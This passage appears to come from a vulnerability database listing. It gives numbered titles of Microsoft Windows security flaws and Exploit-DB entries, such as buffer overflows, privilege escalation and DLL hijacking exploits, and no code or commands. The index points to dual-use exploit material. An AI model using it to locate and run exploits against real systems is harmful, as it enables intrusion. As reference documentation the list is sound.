files with the same name as a system process [6912] Microsoft Windows NT and 2000 Terminal Server RDP memory leak denial of service [6907] Microsoft Windows Media Player .NSC buffer overflow [6876] Microsoft Windows 2000 could allow an attacker to change network passwords [6874] Microsoft Windows 95/98 invalid path in registry could allow malicious file execution [6803] Microsoft Windows 2000 SMTP service allows mail relaying [6745] Microsoft Windows 2000 LDAP function could allow domain user password change [6669] Microsoft Windows 2000 Telnet system call denial of service [6668] Microsoft Windows 2000 Telnet handle leak denial of service [6667] Microsoft Windows 2000 Telnet multiple idle sessions denial of service [6666] Microsoft Windows 2000 Telnet username denial of service [6665] Microsoft Windows 2000 Telnet service weak domain authentication [6664] Microsoft Windows 2000 Telnet service predictable pipe names could allow elevation of privileges [6590] Microsoft Windows 2000 debug registers allow attacker to gain elevated privileges [6584] Microsoft Windows Media Player HTML code hidden in Internet shortcuts [6518] Microsoft Windows Index Server could allow attackers to view files on the Web server [6517] Microsoft Windows NT Index Server &quot [6443] Microsoft Windows 2000 catalog file could remove installed hotfixes [6441] Microsoft Windows NT drivers DbgPrint function format string [6294] Microsoft Windows Me and Plus! 98 recovery of Compressed Folder passwords [6275] Microsoft Windows user.dmp file insecure permissions [6227] Microsoft Windows Media Player allows remote attackers to execute commands in Internet Explorer [6160] Microsoft Windows 2000 event viewer buffer overflow [6136] Microsoft Windows 2000 domain controller denial of service [6103] Microsoft Windows NT PPTP denial of service [6070] Microsoft Windows UDP socket denial of service [6062] Microsoft Windows DDE allows privilege elevation [6035] Microsoft Windows 2000 Server RDP denial of service [6006] Microsoft Windows NT mutex denial of service [5973] Microsoft Windows 2000 EFS allows local user to recover sensitive data [5937] Microsoft Windows Media Player skins can be used to execute arbitrary code [5936] Microsoft Windows 2000 Server Directory Service Restore Mode allows user to login with blank password [5800] Microsoft Windows 2000 Index Service ActiveX controls allow unauthorized access to file information [5746] Microsoft Windows NT MSTask.exe denial of service [5673] Microsoft Windows NT MTS registry permissions [5672] Microsoft Windows NT SNMP registry permissions [5671] Microsoft Windows NT RAS registry permissions [5623] Microsoft Windows NT and 2000 Phone Book service buffer overflow [5598] Microsoft Windows 2000 Telnet daemon could allow a denial of service [5585] Microsoft Windows 2000 brute force attack [5573] Microsoft Windows NT SynAttackProtect denial of service [5502] Microsoft Windows 2000 Indexing Services ixsso.query [5489] Microsoft Windows NT Terminal Server GINA RegAPI.DLL buffer overflow [5467] Microsoft Windows 2000 System Monitor ActiveX control buffer overflow [5417] Microsoft Windows NT MSIEXEC service uses the msi.dll registery key that has weak permissions [5411] Microsoft Windows File Share service denial of service [5399] Microsoft Windows NT and 2000 Network Monitor buffer overflow [5395] Microsoft Windows 9x share level password [5387] Microsoft Windows HyperTerminal Telnet buffer overflow [5370] Microsoft Windows 9x NetBIOS invalid driver type denial of service [5357] Microsoft Windows 9x malformed NWLink NMPI packet denial of service [5315] Microsoft Windows NT invalid LPC request [5301] Microsoft Windows 2000 Simplified Chinese IME State Recognition [5242] Microsoft Windows 2000 Telnet client NTLM authentication weakness [5222] Microsoft Windows 2000 malformed RPC packet denial of service [5203] Microsoft Windows 2000 still image service [5193] Microsoft Windows Media Services Unicast Service denial of service [5171] Microsoft Windows 2000 Local Security Policy corruption [5168] Microsoft Windows NetBIOS cache corruption [5097] Microsoft Windows folder.htt allows execution of active scripting without approval [5079] Microsoft Windows 95/98 malformed IPX ping packet denial of service [5040] Microsoft Windows NT/2000 explorer.exe uses relative path name in registry [5035] Microsoft Windows NT/2000 NetBIOS Name Server spoofed name conflict [5033] Microsoft Windows 2000 without Service Pack 1 [5031] Microsoft Windows 2000 Service Control Manager named pipe could allow a unauthorized user to gain privileges [5015] Microsoft Windows NT and 2000 executable path [4886] Microsoft Windows 2000 logon session reconnected [4885] Microsoft Windows 2000 logon session disconnected [4873] Microsoft Windows 2000 user account mapped for logon [4872] Microsoft Windows 2000 account logon failed [4871] Microsoft Windows 2000 account used for logon [4855] Microsoft Windows 2000 group type change [4828] Microsoft Windows 95/98 ARP spoofing [4823] Microsoft Windows 2000 Telnet server binary stream denial of service [4819] Microsoft Windows 2000 default SYSKEY configuration [4787] Microsoft Windows 2000 user account locked out [4786] Microsoft Windows 2000 computer account created [4785] Microsoft Windows 2000 computer account changed [4784] Microsoft Windows 2000 computer account deleted [4714] Microsoft Windows 2000 &quot [4702] Microsoft Windows event log full [4700] Microsoft Windows computer password not found in local security database [4698] Microsoft Windows EventLog service started [4688] Microsoft Windows Network Monitor driver started [4673] Microsoft Windows resources for queuing of audit messages have been exhausted [4671] Microsoft Windows event log file cannot be opened [4670] Microsoft Windows event log file corrupted [4648] Microsoft Windows NT malformed remote registry request denial of service [4608] Microsoft Windows NT computer account creation can compromise User Session Key [4600] Microsoft Windows NT denial of service caused by unacknowledged SMB requests [4589] Microsoft Windows 2000 protected store can be compromised by brute force attack [4585] Microsoft Windows Encoder denial of service [4552] Microsoft Windows Browser service can be shutdown by an unauthorized remote user [4547] Microsoft Windows Master Browser browse table can be filled with bogus entries [4517] Microsoft Windows NT user account locked out [4516] Microsoft Windows NT user account enabled [4515] Microsoft Windows NT user account disabled [4337] Microsoft Windows NT/2000 cmd.exe buffer overflow [4332] Microsoft Windows NT registry permissions could allow compromise of cryptographic keys [4278] Microsoft Windows 2000 unattended install does not secure All Users profile [4247] Microsoft Windows 95/98 printer sharing allows read access [4221] Microsoft Windows NT drive mapping allows local users to execute arbitrary code [4203] Microsoft Windows TCP/IP Printing Service denial of service [4141] Microsoft Windows can be configured to transmit unencrypted passwords to SMB server [4140] Microsoft Windows Telnet service authentication may expose user passwords [4138] Microsoft Windows 2000 system file integrity feature is disabled [4111] Microsoft Windows NT 4.0 registry permissions [4108] Microsoft Windows Media Technologies malformed license request denial of service [4107] Microsoft Windows path names containing DOS devices denial of service [4086] Microsoft Windows 2000 may not start Jaz drives correctly [4085] Microsoft Windows 2000 non-Gregorial calendar error [4084] Microsoft Windows 2000 may prevent Adobe FrameMaker files from being saved in some formats [4083] Microsoft Windows 2000 Terminal Services may damage Office files saved as HTML [4082] Microsoft Windows 2000 and Iomega parallel port drives display error [4081] Microsoft Windows invalid image error when using OLE libraries [4080] Microsoft Windows 2000 AOL image support [4079] Microsoft Windows 2000 High Encryption Pack [4034] Microsoft Windows Media Services handshake packets denial of service [4016] Microsoft Windows NT Recycle Bin could allow an unauthorized user to modify deleted files [3993] Microsoft Windows Trin00 Distributed Denial of Service (DDoS) tool found [3909] Microsoft Windows 9x share is writable [3906] Microsoft Windows NT share is readable [3694] Microsoft Windows NT malformed resource enumeration denial of service [3574] Microsoft Windows 9x cache could reveal plaintext password [3534] Microsoft Windows NT 4.0 without Service Pack 6 [3373] Microsoft Windows NT user shell folders could allow users to gain administrator privileges [3328] Microsoft Windows ARP packet denial of service [3251] Microsoft Windows allows source routing when configured to reject source routed packets [3248] Microsoft Windows NT RASMAN pathname [3226] Microsoft Windows NT 4.0 unattended installation could expose sensitive information to local users [3168] Microsoft Windows NT SP4-SP6 TCP sequence numbers are predictable [3129] Microsoft Windows Telnet.exe remote buffer overflow [3109] Microsoft Windows NT Phone Dialer utility contains a locally exploitable buffer overflow [3106] Microsoft Windows NT DNS server can be remotely crashed by sending a response to a non-existant request [3104] Microsoft Windows NT TSE denial of service can consume all available memory [2750] Microsoft Windows started/stopped [2677] Microsoft Windows NT old operating system [2549] Microsoft Windows NT install date changed [2336] Microsoft Windows NT login default folder allows a user to bypass policies [2313] Microsoft Windows NT can be crashed by executables containing malformed image headers [2299] Microsoft Windows NT CSRSS denial of service [2291] Microsoft Windows NT Local Security Authority (LSA) can be remotely crashed, requiring a system reboot [2243] Microsoft Windows NT RAS/RRAS clients cache passwords regardless of setting [2201] Microsoft Windows NT 4.0 without Service Pack 5 [2200] Microsoft Windows NT RAS client contains an exploitable buffer overflow [2190] Microsoft Windows NT 4.0 help file utility contains a locally exploitable buffer overflow [2141] Microsoft SQL Server can be configured to use the Windows NT account SQLExecCmdExe when running xp_cmdshell for non-sa logins [2129] Microsoft SQL Server should use limited Windows NT protocols to make attacks more difficult [2102] Microsoft Windows NT allows files to exceed the supposed maximum length [1977] Microsoft Windows NT RPC services can be used to deplete system resources [1976] Microsoft Windows NT gina flaw allows locked-out users to log in [1975] Microsoft Windows NT gina allows some clipboard text to be revealed [1974] Microsoft Windows NT SNMP agent memory leak [1947] Microsoft Windows NT/9x can be frozen with redirect packets [1946] Microsoft Windows NT screen saver can be used to compromise administrator privileges [1820] Microsoft Windows NT 4.0 domain caching feature can be exploited to gain administrator privileges [1771] Microsoft Windows 95/98 configurations may lead to excessive bandwidth consumption [1758] Microsoft SQL Server extended stored procedure, xp_cmdshell, can be used to gain Windows NT administrator rights [1719] Microsoft Windows NT 4.0 SP4 could allow null passwords to be used for access [1566] Microsoft Windows NT user account deleted [1556] Microsoft Windows NT user account created [1394] Microsoft Windows NT 4.0 without Service Pack 4 [1372] Microsoft Windows NT snork attack can disable system [1321] Microsoft Windows Interactive_Guest_Logon [1320] Microsoft Windows legal notice display not enabled [1319] Microsoft Windows local user on workstation [1315] Microsoft Windows network Guest logon [1314] Microsoft Windows NT user has never logged on [1312] Microsoft Windows NT null session user modals [1296] Microsoft Windows service user [1295] Microsoft Windows NT service user password found [1291] Microsoft Windows shutdown without logon enabled [1288] Microsoft Windows NT system key encryption not enabled [1286] Microsoft Windows NT TCP/IP security not enabled [1285] Microsoft Windows trojan key permissions [1284] Microsoft Windows NT trusted domain [1075] Microsoft Windows file-sharing access error [981] Microsoft Windows WINS exploit using SNMP [710] Microsoft Windows NT portbind issue [679] Microsoft Windows null session [539] Microsoft Windows 95 and Internet Explorer password disclosure [538] Microsoft Windows NT Winpopup DoS attack [536] Microsoft Windows NT discloses system information [535] Microsoft Windows NT sometimes does not kill all processes when logging out [534] Microsoft Windows 95 stores many passwords in plain text in the registry [530] Microsoft Windows NT RAS service packet filtering rules can be bypassed [529] Microsoft Windows NT case problems can lead to admin access [528] Microsoft Windows NT fragmentation attack [526] Microsoft Windows NT path is insecure and can be easily trojaned [342] Microsoft Windows NT SMB logon denial of service [283] Microsoft Windows account password guessed [186] Microsoft Windows NT DNS denial of service [172] Microsoft Windows NT Post-SP2 security patches missing [168] Microsoft Windows key with incorrect permissions [140] Microsoft Windows telnet service installed [138] Microsoft Windows system log accessible [121] Microsoft Windows NT security log accessible [120] Microsoft Windows schedule service running [114] Microsoft Windows NT rsh service Running [102] Microsoft Windows NT rexec service running [99] Microsoft Windows registry can be opened remotely [98] Microsoft Windows NT rcmd service running [92] Microsoft Windows NT rlogin service installed [66] Microsoft Windows NT kernel outdated [17] Microsoft Windows NT RPC locator denial of service [16] Microsoft Windows Remote Access Service [14] Microsoft Windows NT 4.0 without Service Pack 3 [13] Microsoft Windows Network Monitor insecure password [11] Microsoft Windows NT 4.0 beta Exploit-DB - https://www.exploit-db.com: [30825] Microsoft Windows Media Digital Rights Management ActiveX Control Buffer Overflow Vulnerability [30645] Microsoft Windows URI Handler Command Execution Vulnerability [30636] Microsoft Windows 2000/2003 Recursive DNS Spoofing Vulnerability (2) [30635] Microsoft Windows 2000/2003 Recursive DNS Spoofing Vulnerability (1) [30619] Microsoft Windows Explorer PNG Image - Local Denial Of Service Vulnerability [30462] Microsoft Windows Media Player 11 - AU Divide-By-Zero Denial of Service Vulnerability [30392] Microsoft Windows ndproxy.sys - Local Privilege Escalation [30160] Microsoft Windows XP - GDI+ ICO File Remote Denial of Service Vulnerability [29813] Microsoft Windows Vista ARP Table Entries Denial of Service Vulnerability [29771] Microsoft Windows Vista Windows Mail Local File Execution Vulnerability [29738] Microsoft Windows XP/2000 WinMM.DLL - WAV Files Remote Denial of Service (DoS) Vulnerability [29659] Microsoft Windows XP/2003 Explorer WMF File Handling Denial of Service Vulnerability [29630] Microsoft Windows 2003/XP ReadDirectoryChangesW Information Disclosure Vulnerability [29286] Microsoft Windows Explorer explorer.exe WMV File Handling DoS [29285] Microsoft Windows Media 6.4/10.0 - MID Malformed Header Chunk DoS [28834] Microsoft Windows XP CMD.EXE Buffer Overflow Vulnerability [28482] MS13-071 Microsoft Windows Theme File Handling Arbitrary Code Execution [28420] Microsoft Windows 2000 Multiple COM Object Instantiation Code Execution Vulnerabilities [28381] microsoft windows xp/2000/2003 help Multiple Vulnerabilities [28357] Microsoft Windows Explorer 2000/2003/XP Drag and Drop Remote Code Execution Vulnerability [28299] Microsoft Windows XP/2000/2003 Graphical Device Interface Plus Library Denial of Service Vulnerability [28263] Microsoft Windows XP/2000/2003 Remote Denial of Service Vulnerability [28227] Microsoft Windows 2000/XP Registry Access Local Denial of Service Vulnerability [27930] Microsoft Windows XP/2000/2003 MHTML URI Buffer Overflow Vulnerability [27851] Microsoft Windows - Path Conversion Weakness [27051] Microsoft Windows Graphics Rendering Engine Multiple Memory Corruption Vulnerabilities [26690] Microsoft Windows 2000/2003/XP CreateRemoteThread Local Denial of Service Vulnerability [26341] Microsoft Windows 2000/2003/XP MSDTC TIP Denial of Service Vulnerability [26323] Microsoft Windows XP Wireless Zero Configuration Service Information Disclosure Vulnerability [26222] Microsoft Windows 2000/2003/XP Keyboard Event Privilege Escalation Weakness [25737] Microsoft Windows 98SE User32.DLL Icon Handling Denial of Service Vulnerability [25454] Microsoft Windows 98/2000 Explorer Preview Pane Script Injection Vulnerability [25384] Microsoft Windows 2000/XP Internet Protocol Validation Remote Code Execution Vulnerability (2) [25383] Microsoft Windows 2000/XP Internet Protocol Validation Remote Code Execution Vulnerability (1) [25268] Microsoft Windows XP TSShutdn.exe Remote Denial of Service Vulnerability [25259] Microsoft Windows XP Local Denial of Service Vulnerability [25231] Microsoft Windows 2000/2003/XP Graphical Device Interface Library Denial of Service Vulnerability [25050] Microsoft Windows 2000/2003/XP winhlp32 Phrase Heap Overflow Vulnerability [25049] Microsoft Windows 2000/2003/XP winhlp32 Phrase Integer Overflow Vulnerability [24699] Microsoft Windows XP WAV File Handler Denial of Service Vulnerability [24682] Microsoft Windows XP Weak Default Configuration Vulnerability [24605] Microsoft Windows XP Explorer.EXE TIFF Image Denial of Service Vulnerability [24277] Microsoft Windows 2000/NT 4 POSIX Subsystem Buffer Overflow Local Privilege Escalation Vulnerability [24173] PHP 4.3.x Microsoft Windows Shell Escape Functions Command Execution Vulnerability [24125] Microsoft Windows XP Self-Executing Folder Vulnerability [24051] Microsoft Windows XP/2000/NT 4 Shell Long Share Name Buffer Overrun Vulnerability [23989] Microsoft Windows 2000/NT 4 Local Descriptor Table Local Privilege Escalation Vulnerability [23850] Microsoft Windows XP Explorer.EXE Remote Denial of Service Vulnerability [23717] Microsoft Windows XP Help And Support Center Interface Spoofing Weakness [23675] Microsoft Windows XP HCP URI Handler Arbitrary Command Execution Vulnerability [23504] Microsoft Windows XP/2000 showHelp CHM File Execution Weakness [23247] Microsoft Windows XP/2000 Messenger Service Buffer Overrun Vulnerability [23229] Microsoft Windows XP/2000/2003 Message Queuing Service Heap Overflow Vulnerability [23210] Microsoft Windows XP/2000 PostThreadMessage() Arbitrary Process Killing Vulnerability [23179] Oracle MySQL for Microsoft Windows MOF Execution [23101] Microsoft Windows 98 Fragmented UDP Flood Denial of Service Vulnerability [23093] Microsoft Windows XP TCP Packet Information Leakage Vulnerability [23019] Microsoft Windows 2000 Subnet Bandwidth Manager RSVP Server Authority Hijacking Vulnerability [22917] Microsoft Windows DCOM RPC Interface Buffer Overrun Vulnerability [22883] Microsoft Windows 2000 CreateFile API Named Pipe Privilege Escalation Vulnerability (2) [22882] Microsoft Windows 2000 CreateFile API Named Pipe Privilege Escalation Vulnerability (1) [22870] Microsoft Windows XP/2000 RunDLL32.EXE Buffer Overflow Vulnerability [22837] Microsoft Windows 2000/NT 4 Media Services NSIISlog.DLL Remote Buffer Overflow [22824] Microsoft Windows XP/2000/NT 4 HTML Converter HR Align Buffer Overflow Vulnerability [22782] Microsoft Windows 2000 Active Directory Remote Stack Overflow Vulnerability [22570] Microsoft Windows Media Player 7.1 Skin File Code Execution Vulnerability [22528] Microsoft Windows 2000 RegEdit.EXE Registry Key Value Buffer Overflow Vulnerability [22368] Microsoft Windows XP/2000/NT 4 ntdll.dll Buffer Overflow Vulnerability (4) [22367] Microsoft Windows XP/2000/NT 4 ntdll.dll Buffer Overflow Vulnerability (3) [22366] Microsoft Windows XP/2000/NT 4 ntdll.dll Buffer Overflow Vulnerability (2) [22365] Microsoft Windows XP/2000/NT 4 ntdll.dll Buffer Overflow Vulnerability (1) [22354] Microsoft Windows 2000 Help Facility .CNT File :Link Buffer Overflow Vulnerability [22303] Microsoft Windows Help program (WinHlp32.exe) Crash PoC [22289] Microsoft Windows XP/ME Help and Support Center Buffer Overflow Vulnerability [22255] Microsoft Windows XP/95/98/2000/NT 4 Riched20.dll Attribute Buffer Overflow Vulnerability [22245] Microsoft Windows NT/2000 cmd.exe CD Buffer Overflow Vulnerability [22232] Microsoft Windows XP HCP URI Buffer Overflow Vulnerability [22225] Microsoft Windows XP Redirector Privilege Escalation Vulnerability [22194] Microsoft Windows XP/2000/NT 4 Locator Service Buffer Overflow Vulnerability [22132] Microsoft Windows XP/2000 Fontview Denial of Service Vulnerability [21954] Microsoft Windows XP/2000/NT 4 RPC Service Denial of Service Vulnerability (4) [21953] Microsoft Windows XP/2000/NT 4 RPC Service Denial of Service Vulnerability (3) [21952] Microsoft Windows XP/2000/NT 4 RPC Service Denial of Service Vulnerability (2) [21951] Microsoft Windows XP/2000/NT 4 RPC Service Denial of Service Vulnerability (1) [21717] Microsoft Windows XP HCP URI Handler Abuse Vulnerability [21670] Microsoft Windows Media Player 6/7 Filename Buffer Overflow Vulnerability [21485] Microsoft Windows 95/98/2000/NT4 WinHlp Item Buffer Overflow Vulnerability [21389] Microsoft Windows 2000 Lanman Denial of Service Vulnerability (2) [21388] Microsoft Windows 2000 Lanman Denial of Service Vulnerability (1) [21344] Microsoft Windows 2000 / NT 4.0 Process Handle Local Privilege Elevation Vulnerability [21258] Microsoft Windows 2000/NT 4 NTFS File Hiding Vulnerability [21246] Microsoft Windows 2000/NT 4 TCP Stack DoS Vulnerability (2) [21245] Microsoft Windows 2000/NT 4 TCP Stack DoS Vulnerability (1) [21240] Microsoft Windows XP .Manifest Denial of Service Vulnerability [21172] Microsoft Windows 2000 Internet Key Exchange DoS Vulnerability (2) [21171] Microsoft Windows 2000 Internet Key Exchange DoS Vulnerability (1) [21131] Microsoft Windows 2000/XP GDI Denial of Service Vulnerability [21130] Microsoft Windows NT 3/4 CSRSS Memory Access Violation Vulnerability [21123] Microsoft Windows 2000/NT Terminal Server Service RDP DoS Vulnerability [21099] Microsoft Windows 2000 RunAs Service Denial of Services Vulnerability [21069] Microsoft Windows 2000 RunAs Service Named Pipe Hijacking Vulnerability [21047] Microsoft Windows NT 4.0 NT4ALL DoS Vulnerability [20907] Microsoft Windows 2000 Telnet Username DoS Vulnerability [20861] Microsoft Windows Kernel Intel x64 SYSRET PoC [20613] Microsoft Windows 98/2000 UDP Socket DoS Vulnerability [20596] Microsoft Windows NT 4.0 Networking Mutex DoS Vulnerability [20564] Microsoft Windows NT 4.0 SNMP-WINS DoS Vulnerability [20553] Microsoft Windows Media Player 7.0 .WMZ Arbitrary Java Applet Vulnerability [20528] Microsoft Windows Media Player 7.0 Javascript URL Vulnerability [20460] Microsoft Windows NT 4.0 PhoneBook Server Buffer Overflow [20427] Microsoft Windows Media Player 7.0 .ASX Buffer Overflow Vulnerability [20424] Microsoft Windows Media Player 7.0 .WMS Arbitrary Script Vulnerability [20399] Microsoft Indexing Services for Windows 2000 File Verification Vulnerability [20371] Microsoft Windows 95/WfW smbclient Directory Traversal Vulnerability [20335] Microsoft Indexing Services for Windows 2000/NT 4.0 .htw Cross-Site Scripting Vulnerability [20317] Microsoft Windows NT 4.0 MSIEXEC Registry Permissions Vulnerability [20288] Microsoft Windows 9x File Handle Buffer Overflow Vulnerability [20284] Microsoft Windows 9x / Me Share Level Password Bypass Vulnerability (2) [20283] Microsoft Windows 9x / Me Share Level Password Bypass Vulnerability (1) [20265] Microsoft Windows NT 4.0 / 2000 Spoofed LPC Request Vulnerability [20257] Microsoft Windows NT 4.0 / 2000 Predictable LPC Message Identifier Multiple Vulnerabilities [20255] Microsoft Windows NT 4.0 / 2000 LPC Zone Memory Depletion DoS Vulnerability [20254] Microsoft Windows NT 4.0 Invalid LPC Request DoS Vulnerability [20243] Microsoft Windows Script Host 5.1/5.5 GetObject() File Disclosure Vulnerability [20240] Microsoft Windows Media Player 7 Embedded OCX Control Vulnerability [20222] Microsoft Windows 2000 telnet.exe NTLM Authentication Vulnerability [20209] Microsoft Windows 2000 Still Image Service Privilege Escalation Vulnerability [20133] Microsoft Windows 2000 Named Pipes Predictability Vulnerability [20106] Microsoft Windows NT 4/2000 NetBIOS Name Conflict Vulnerability [20048] Microsoft Windows 2000 Remote CPU-overload Vulnerability [20047] Microsoft Windows 2000 Telnet Server DoS Vulnerability [19974] Microsoft Windows Media Services 4.0/4.1 DoS Vulnerability [19889] Microsoft Windows 95/98 NetBIOS NULL Name Vulnerability [19798] Microsoft Windows NT 4.0 User Shell Folders Vulnerability [19759] Microsoft Windows Media Services 4.0/4.1 Handshake Sequence DoS [19754] Microsoft Windows 95/98/NT 4.0 autorun.inf Vulnerability [19739] Microsoft Windows NT 4.0 Recycle Bin Pre-created Folder Vulnerability [19731] microsoft index server 2.0/indexing services for windows 2000 - Directory Traversal [19673] Microsoft Windows 95/98/NT 4.0 Help File Trojan Vulnerability [19578] Microsoft Windows NT 4.0/SP1/SP2/SP3/SP4/SP5/SP6 Services.exe Denial of Service (2) [19577] Microsoft Windows NT 4.0/SP1/SP2/SP3/SP4/SP5/SP6 Services.exe Denial of Service (1) [19502] Microsoft Windows NT 4.0/SP1/SP2/SP3/SP4/SP5 RASMAN Privilege Escalation Vulnerability [19489] Microsoft Windows NT 4.0 DCOM Server Vulnerability [19462] Microsoft Windows 95/98 IE5/Telnet Heap Overflow Vulnerability [19451] Microsoft Windows 98 a/98 b/98SE,Solaris 2.6 IRDP Vulnerability [19440] Microsoft Windows NT 4.0/SP 1/SP 2/Sp 3/SP 4/SP 5 Malformed Dialer Entry Vulnerability [19372] Microsoft Windows NT 4.0/SP 1/SP 2/SP 3/SP 4/SP 5 Null Session Admin Name Vulnerability [19359] Microsoft Windows NT 4.0/SP1/SP2/SP3/SP4,Windows NT 3.5.1/SP1/SP2/SP3/SP4/SP5 Screensaver Vulnerability [19239] Microsoft Windows NT 4.0/4.0 SP1/4.0 SP2/4.0 SP3/4.0 SP4/4.0 SP5 IIS IDC Path Mapping Vulnerability [19238] Microsoft Windows NT 4.0/4.0 SP1/4.0 SP2/4.0 SP3 DoS Duplicate Hostname Vulnerability [19211] Microsoft Windows NT 4.0/4.0 SP1/4.0 SP2/4.0 SP3/4.0 SP4/4.0 SP5 RAS Phonebook Buffer Overflow Vulnerability [19209] Microsoft Windows NT 4.0/4.0 SP1/4.0 SP2/4.0 SP3/4.0 SP4/4.0 SP5 Help File Buffer Overflow Vulnerability [19198] Microsoft Windows NT <= 4.0 SP4 Known DLL Cache Vulnerability [19197] "Microsoft Windows NT <= 4.0 SP5,Terminal Server 4.0 ""Pass the Hash"" with Modified SMB Client Vulnerability" [19196] "Microsoft Windows NT 4.0/4.0 SP1/4.0 SP2/4.0 SP3/4.0 SP4/4.0 SP5 RAS Dial-up Networking ""Save Password"" Vulnerability" [19195] Microsoft Windows NT 4.0/4.0 SP1/4.0 SP2/4.0 SP3 LSA Secrets Vulnerability [19143] "Microsoft Windows ""April Fools 2001"" Vulnerability" [19113] Microsoft Windows NT 3.5.1 SP2/3.5.1 SP3/3.5.1 SP4/3.5.1 SP5/4.0/4.0 SP1/4.0 SP2/4.0 SP3/4.0 SP4/4.0 SP5 Telnetd Vulnerability [19103] HP HP-UX <= 10.34,Microsoft Windows 95/NT 3.5.1 SP1/NT 3.5.1 SP2/NT 3.5.1 SP3/NT 3.5.1 SP4/NT 4.0/NT 4.0 SP1/NT 4.0 SP2/NT 4.0 SP3 [19002] Microsoft Windows OLE Object File Handling Remote Code Execution [18819] Microsoft Windows xp Win32k.sys Local Kernel DoS Vulnerability [18372] Microsoft Windows Assembly Execution Vulnerability MS12-005 [17305] "Microsoft Windows Vista/Server 2008 ""nsiproxy.sys"" Local Kernel DoS Exploit" [17133] Microsoft Windows xp AFD.sys Local Kernel DoS Exploit [17037] PostgreSQL for Microsoft Windows Payload Execution [16957] Oracle MySQL for Microsoft Windows Payload Execution [16660] Microsoft Windows CreateSizedDIBSECTION Stack Buffer Overflow [16574] Microsoft Windows Shell LNK Code Execution [16374] Microsoft Windows Authenticated User Code Execution [16363] Microsoft Windows SRV2.SYS SMB Negotiate ProcessID Function Table Dereference [16360] Microsoft Windows SMB Relay Code Execution [15839] Microsoft Windows Fax Services Cover Page Editor (.cov) Memory Corruption [14778] Microsoft Windows Contacts DLL Hijacking Exploit (wab32res.dll) [14733] Microsoft Windows 7 wab.exe DLL Hijacking Exploit (wab32res.dll) [14731] Microsoft Windows Movie Maker <= 2.6.4038.0 DLL Hijacking Exploit (hhctrl.ocx) [14705] Microsoft Windows (IcmpSendEcho2Ex interrupting) Denial of Service Vulnerability [14674] Microsoft Windows SRV2.SYS SMB Negotiate ProcessID Function Table Dereference (MS09-050) [14670] Microsoft Windows nt!SeObjectCreateSaclAccessBits() Missed ACE Bounds Checks (MS10-047) [14669] Microsoft Windows win32k!GreStretchBltInternal() Does Not Handle src == dest [14668] Microsoft Windows win32k!xxxRealDrawMenuItem() Missing HBITMAP Bounds Checks [14667] Microsoft Windows KTM Invalid Free with Reused Transaction GUID (MS10-047) [14666] Microsoft Windows nt!NtCreateThread Race Condition with Invalid Code Segment (MS10-047) [14611] Microsoft Windows 'SfnLOGONNOTIFY' Local Privilege Escalation Vulnerability (MS10-048) [14610] Microsoft Windows Tracing Registry Key ACL Privilege Escalation Vulnerability [14608] Microsoft Windows CreateWindow Function Callback Vulnerability (MS10-048) [14566] "Microsoft Windows win32k.sys Driver ""CreateDIBPalette()"" Buffer Overflow" [14403] Microsoft Windows Automatic LNK Shortcut File Code Execution [13808] Microsoft Windows Help Centre Handles Malformed Escape Sequences Incorrectly [12564] Microsoft Windows Outlook Express and Windows Mail Integer Overflow [11195] Microsoft Windows Defender ActiveX Heap Overflow PoC [10068] Microsoft Windows 2000-2008 Embedded OpenType Font Engine Remote Code Execution [9301] Microsoft Windows XP (win32k.sys) Local Privilege Escalation Exploit [4045] Microsoft Windows Animated Cursor Stack Overflow Exploit [3746] Microsoft Windows DNS RPC - Remote Buffer Overflow Exploit (port 445) (2) [1352] Microsoft Windows DTC Remote Exploit (PoC) (MS05-051) (updated) [31118] Microsoft Works 8.0 File Converter Field Length Remote Code Execution Vulnerability [30901] Apache HTTP Server 2.2.6 Windows Share PHP File Extension Mapping Information Disclosure Vulnerability [30887] phPay 2.2.1 Windows Installations Local File Include Vulnerability [30773] Microsoft Jet Database Engine MDB File Parsing Remote Buffer Overflow Vulnerability [30767] Apple Safari 3.0.x for Windows Document.Location.Hash Buffer Overflow Vulnerability [30756] Microsoft Forms 2.0 ActiveX Control 2.0 Memory Access Violation Denial of Service Vulnerabilities [30749] Microsoft Office 2003 Web Component Memory Access Violation Denial of Service Vulnerability [30622] Microsoft Internet Explorer 5.0.1 File Upload Vulnerability [30593] Microsoft MFC Library CFileFind::FindFile Buffer Overflow Vulnerability [30567] Microsoft Agent agentdpv.dll ActiveX Control Malformed URL Stack Buffer Overflow Vulnerability [30537] Microsoft MSN Messenger <= 8.0 - Video Conversation Buffer Overflow Vulnerability [30494] Microsoft Internet Explorer 5.0.1 Vector Markup Language VGX.DLL Remote Buffer Overflow Vulnerability [30493] Microsoft XML Core Services <= 6.0 SubstringData Integer Overflow Vulnerability [30490] Microsoft Internet Explorer 5.0.1 TBLinf32.DLL ActiveX Control Remote Code Execution Vulnerability [30455] Microsoft Internet Explorer 6.0 Position:Relative Denial of Service Vulnerability [30397] Windows Kernel win32k.sys - Integer Overflow (MS13-101) [30285] Microsoft Internet Explorer and Mozilla Firefox URI Handler Command Injection Vulnerability [30281] Microsoft .Net Framework <= 2.0 - Multiple Null Byte Injection Vulnerabilities [30194] Apple Safari 3 for Windows Document.Location Denial of Service Vulnerability [30193] Apple Safari 3.0.1 for Windows Corefoundation.DLL Denial of Service Vulnerability [30176] Apple Safari 3 for Windows Protocol Handler Command Injection Vulnerability [30169] WindowsPT 1.2 User ID Key Spoofing Vulnerability [30014] Windows NDPROXY - Local SYSTEM Privilege Escalation [30011] Microsoft Tagged Image File Format (TIFF) Integer Overflow [29951] Microsoft SharePoint Server 3.0 Cross-Site Scripting Vulnerability [29858] MS12-022 Microsoft Internet Explorer COALineDashStyleArray Unsafe Memory Access [29800] Microsoft Internet Explorer 7.0 HTML Denial of Service Vulnerability [29741] Microsoft Internet Explorer 7.0 NavCancel.HTM Cross-Site Scripting Vulnerability [29664] Microsoft Office Publisher 2007 - Remote Denial of Service (DoS) Vulnerability [29660] Microsoft Office 2003 - Denial of Service (DoS) Vulnerability [29619] Microsoft Internet Explorer 6.0 - Local File Access Weakness [29536] Microsoft Internet Explorer 5.0.1 - Multiple ActiveX Controls Denial of Service Vulnerabilities [29524] Microsoft Word 2000 - Malformed Function Code Execution Vulnerability [29295] Microsoft Outlook ActiveX Control Remote Internet Explorer Denial of Service Vulnerability [29292] XAMPP for Windows 1.8.2 - Blind SQL Injection [29236] Microsoft Internet Explorer 7.0 CSS Width Element Denial of Service Vulnerability [29229] Microsoft Internet Explorer 6.0 Frame Src Denial of Service Vulnerability [29172] Microsoft Office 97 HTMLMARQ.OCX Library Denial of Service Vulnerability [28996] Messagebox Shellcode (113 bytes) - Any Windows Version [28974] MS13-080 